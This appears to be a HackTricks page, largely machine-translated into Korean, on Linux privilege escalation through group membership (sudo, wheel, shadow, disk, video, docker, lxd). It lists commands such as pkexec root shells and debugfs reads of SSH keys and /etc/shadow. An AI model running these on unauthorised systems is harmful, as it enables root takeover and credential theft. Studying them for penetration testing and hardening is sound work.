{% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! * **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %} # Sudo/Admin Groups ## **PE - Method 1** **λ•Œλ•Œλ‘œ**, **기본적으둜 \(λ˜λŠ” 일뢀 μ†Œν”„νŠΈμ›¨μ–΄κ°€ ν•„μš”ν•˜κΈ° λ•Œλ¬Έμ—\)** **/etc/sudoers** 파일 μ•ˆμ—μ„œ λ‹€μŒκ³Ό 같은 쀄을 찾을 수 μžˆμŠ΅λ‹ˆλ‹€: ```bash # Allow members of group sudo to execute any command %sudo ALL=(ALL:ALL) ALL # Allow members of group admin to execute any command %admin ALL=(ALL:ALL) ALL ``` 이것은 **sudo λ˜λŠ” admin 그룹에 μ†ν•œ λͺ¨λ“  μ‚¬μš©μžκ°€ sudo둜 무엇이든 μ‹€ν–‰ν•  수 μžˆμŒμ„ μ˜λ―Έν•©λ‹ˆλ‹€**. 이 경우, **rootκ°€ 되렀면 λ‹€μŒμ„ μ‹€ν–‰ν•˜λ©΄ λ©λ‹ˆλ‹€**: ```text sudo su ``` ## PE - Method 2 λͺ¨λ“  suid λ°”μ΄λ„ˆλ¦¬λ₯Ό 찾아보고 **Pkexec** λ°”μ΄λ„ˆλ¦¬κ°€ μžˆλŠ”μ§€ ν™•μΈν•˜μ‹­μ‹œμ˜€: ```bash find / -perm -4000 2>/dev/null ``` If you find that the binary pkexec is a SUID binary and you belong to sudo or admin, you could probably execute binaries as sudo using pkexec. λ‹€μŒ λ‚΄μš©μ„ ν™•μΈν•˜μ„Έμš”: ```bash cat /etc/polkit-1/localauthority.conf.d/* ``` μ—¬κΈ°μ—μ„œ μ–΄λ–€ 그룹이 **pkexec**λ₯Ό μ‹€ν–‰ν•  수 μžˆλŠ”μ§€ 확인할 수 있으며, **기본적으둜** 일뢀 λ¦¬λˆ…μŠ€μ—μ„œλŠ” **sudo λ˜λŠ” admin** 그룹이 **λ‚˜νƒ€λ‚  수 μžˆμŠ΅λ‹ˆλ‹€**. **λ£¨νŠΈκ°€ 되렀면 λ‹€μŒμ„ μ‹€ν–‰ν•  수 μžˆμŠ΅λ‹ˆλ‹€**: ```bash pkexec "/bin/sh" #You will be prompted for your user password ``` λ§Œμ•½ **pkexec**λ₯Ό μ‹€ν–‰ν•˜λ €κ³  μ‹œλ„ν–ˆλŠ”λ° 이 **였λ₯˜**κ°€ λ°œμƒν•œλ‹€λ©΄: ```bash polkit-agent-helper-1: error response to PolicyKit daemon: GDBus.Error:org.freedesktop.PolicyKit1.Error.Failed: No session for cookie ==== AUTHENTICATION FAILED === Error executing command as another user: Not authorized ``` **κΆŒν•œμ΄ μ—†μ–΄μ„œκ°€ μ•„λ‹ˆλΌ GUI 없이 μ—°κ²°λ˜μ–΄ μžˆμ§€ μ•ŠκΈ° λ•Œλ¬Έμž…λ‹ˆλ‹€**. 이 λ¬Έμ œμ— λŒ€ν•œ ν•΄κ²° 방법은 μ—¬κΈ°μ—μ„œ 확인할 수 μžˆμŠ΅λ‹ˆλ‹€: [https://github.com/NixOS/nixpkgs/issues/18012\#issuecomment-335350903](https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903). **2개의 μ„œλ‘œ λ‹€λ₯Έ ssh μ„Έμ…˜**이 ν•„μš”ν•©λ‹ˆλ‹€: {% code title="session1" %} ```bash echo $$ #Step1: Get current PID pkexec "/bin/bash" #Step 3, execute pkexec #Step 5, if correctly authenticate, you will have a root session ``` {% endcode %} {% code title="session2" %} ```bash pkttyagent --process #Step 2, attach pkttyagent to session1 #Step 4, you will be asked in this session to authenticate to pkexec ``` {% endcode %} # Wheel Group **λ•Œλ•Œλ‘œ**, **기본적으둜** **/etc/sudoers** 파일 μ•ˆμ—μ„œ 이 쀄을 찾을 수 μžˆμŠ΅λ‹ˆλ‹€: ```text %wheel ALL=(ALL:ALL) ALL ``` 이것은 **wheel 그룹에 μ†ν•œ λͺ¨λ“  μ‚¬μš©μžκ°€ sudo둜 λͺ¨λ“  것을 μ‹€ν–‰ν•  수 μžˆμŒμ„ μ˜λ―Έν•©λ‹ˆλ‹€**. 이 경우, **rootκ°€ 되렀면 λ‹€μŒμ„ μ‹€ν–‰ν•˜λ©΄ λ©λ‹ˆλ‹€**: ```text sudo su ``` # Shadow Group **shadow** 그룹의 μ‚¬μš©μžλ“€μ€ **/etc/shadow** νŒŒμΌμ„ **읽을** 수 μžˆμŠ΅λ‹ˆλ‹€: ```text -rw-r----- 1 root shadow 1824 Apr 26 19:10 /etc/shadow ``` So, read the file and try to **crack some hashes**. # Disk Group 이 κΆŒν•œμ€ **루트 μ ‘κ·Όκ³Ό 거의 동등**ν•˜μ—¬ λ¨Έμ‹  λ‚΄λΆ€μ˜ λͺ¨λ“  데이터에 μ ‘κ·Όν•  수 μžˆμŠ΅λ‹ˆλ‹€. Files:`/dev/sd[a-z][1-9]` ```text debugfs /dev/sda1 debugfs: cd /root debugfs: ls debugfs: cat /root/.ssh/id_rsa debugfs: cat /etc/shadow ``` Note that using debugfs you can also **write files**. For example to copy `/tmp/asd1.txt` to `/tmp/asd2.txt` you can do: 디버그 파일 μ‹œμŠ€ν…œ(debugfs)을 μ‚¬μš©ν•˜λ©΄ **νŒŒμΌμ„ μ“Έ 수** μžˆλ‹€λŠ” 점에 μœ μ˜ν•˜μ„Έμš”. 예λ₯Ό λ“€μ–΄ `/tmp/asd1.txt`λ₯Ό `/tmp/asd2.txt`둜 λ³΅μ‚¬ν•˜λ €λ©΄ λ‹€μŒκ³Ό 같이 ν•  수 μžˆμŠ΅λ‹ˆλ‹€: ```bash debugfs -w /dev/sda1 debugfs: dump /tmp/asd1.txt /tmp/asd2.txt ``` κ·ΈλŸ¬λ‚˜ **rootκ°€ μ†Œμœ ν•œ 파일** \(예: `/etc/shadow` λ˜λŠ” `/etc/passwd`\)을 **μ“°κΈ°** μ‹œλ„ν•˜λ©΄ "**Permission denied**" 였λ₯˜κ°€ λ°œμƒν•©λ‹ˆλ‹€. # Video Group `w` λͺ…λ Ήμ–΄λ₯Ό μ‚¬μš©ν•˜λ©΄ **μ‹œμŠ€ν…œμ— λ‘œκ·ΈμΈν•œ μ‚¬λžŒ**을 찾을 수 있으며, λ‹€μŒκ³Ό 같은 좜λ ₯을 λ³΄μ—¬μ€λ‹ˆλ‹€: ```bash USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT yossi tty1 22:16 5:13m 0.05s 0.04s -bash moshe pts/1 10.10.14.44 02:53 24:07 0.06s 0.06s /bin/bash ``` The **tty1**λŠ” μ‚¬μš©μž **yossiκ°€ 물리적으둜** λ¨Έμ‹ μ˜ 터미널에 λ‘œκ·ΈμΈν–ˆμŒμ„ μ˜λ―Έν•©λ‹ˆλ‹€. **video group**은 ν™”λ©΄ 좜λ ₯을 λ³Ό 수 μžˆλŠ” κΆŒν•œμ΄ μžˆμŠ΅λ‹ˆλ‹€. 기본적으둜 화면을 κ΄€μ°°ν•  수 μžˆμŠ΅λ‹ˆλ‹€. 이λ₯Ό μœ„ν•΄μ„œλŠ” **ν˜„μž¬ ν™”λ©΄μ˜ 이미지λ₯Ό** μ›μ‹œ λ°μ΄ν„°λ‘œ κ°€μ Έμ˜€κ³  화면이 μ‚¬μš©ν•˜λŠ” 해상도λ₯Ό μ•Œμ•„μ•Ό ν•©λ‹ˆλ‹€. ν™”λ©΄ λ°μ΄ν„°λŠ” `/dev/fb0`에 μ €μž₯ν•  수 있으며, 이 ν™”λ©΄μ˜ ν•΄μƒλ„λŠ” `/sys/class/graphics/fb0/virtual_size`μ—μ„œ 찾을 수 μžˆμŠ΅λ‹ˆλ‹€. ```bash cat /dev/fb0 > /tmp/screen.raw cat /sys/class/graphics/fb0/virtual_size ``` To **open** the **raw image** you can use **GIMP**, select the **`screen.raw`** file and select as file type **Raw image data**: ![](../../.gitbook/assets/image%20%28208%29.png) Then modify the Width and Height to the ones used on the screen and check different Image Types \(and select the one that shows better the screen\): ![](../../.gitbook/assets/image%20%28295%29.png) # Root Group 기본적으둜 **root 그룹의 ꡬ성원**은 **μ„œλΉ„μŠ€** ꡬ성 νŒŒμΌμ΄λ‚˜ 일뢀 **라이브러리** 파일 λ˜λŠ” κΆŒν•œ μƒμŠΉμ— μ‚¬μš©ν•  수 μžˆλŠ” **기타 ν₯미둜운 것듀**을 **μˆ˜μ •**ν•  수 μžˆλŠ” μ ‘κ·Ό κΆŒν•œμ„ κ°€μ§ˆ 수 μžˆλŠ” 것 κ°™μŠ΅λ‹ˆλ‹€... **root ꡬ성원이 μˆ˜μ •ν•  수 μžˆλŠ” 파일 확인**: ```bash find / -group root -perm -g=w 2>/dev/null ``` # Docker Group 호슀트 λ¨Έμ‹ μ˜ 루트 파일 μ‹œμŠ€ν…œμ„ μΈμŠ€ν„΄μŠ€μ˜ λ³Όλ₯¨μ— λ§ˆμš΄νŠΈν•  수 μžˆμœΌλ―€λ‘œ, μΈμŠ€ν„΄μŠ€κ°€ μ‹œμž‘λ  λ•Œ μ¦‰μ‹œ ν•΄λ‹Ή λ³Όλ₯¨μ— `chroot`λ₯Ό λ‘œλ“œν•©λ‹ˆλ‹€. μ΄λŠ” 사싀상 λ¨Έμ‹ μ—μ„œ 루트λ₯Ό μ œκ³΅ν•˜λŠ” κ²ƒμž…λ‹ˆλ‹€. {% embed url="https://github.com/KrustyHack/docker-privilege-escalation" %} {% embed url="https://fosterelli.co/privilege-escalation-via-docker.html" %} # lxc/lxd Group [lxc - Privilege Escalation](lxd-privilege-escalation.md) {% hint style="success" %} AWS ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ GCP ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
HackTricks μ§€μ›ν•˜κΈ° * [**ꡬ독 κ³„νš**](https://github.com/sponsors/carlospolop) ν™•μΈν•˜κΈ°! * **πŸ’¬ [**Discord κ·Έλ£Ή**](https://discord.gg/hRep4RUj7f) λ˜λŠ” [**ν…”λ ˆκ·Έλž¨ κ·Έλ£Ή**](https://t.me/peass)에 μ°Έμ—¬ν•˜κ±°λ‚˜ **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**λ₯Ό νŒ”λ‘œμš°ν•˜μ„Έμš”.** * **[**HackTricks**](https://github.com/carlospolop/hacktricks) 및 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) κΉƒν—ˆλΈŒ 리포지토리에 PR을 μ œμΆœν•˜μ—¬ ν•΄ν‚Ή νŠΈλ¦­μ„ κ³΅μœ ν•˜μ„Έμš”.**
{% endhint %}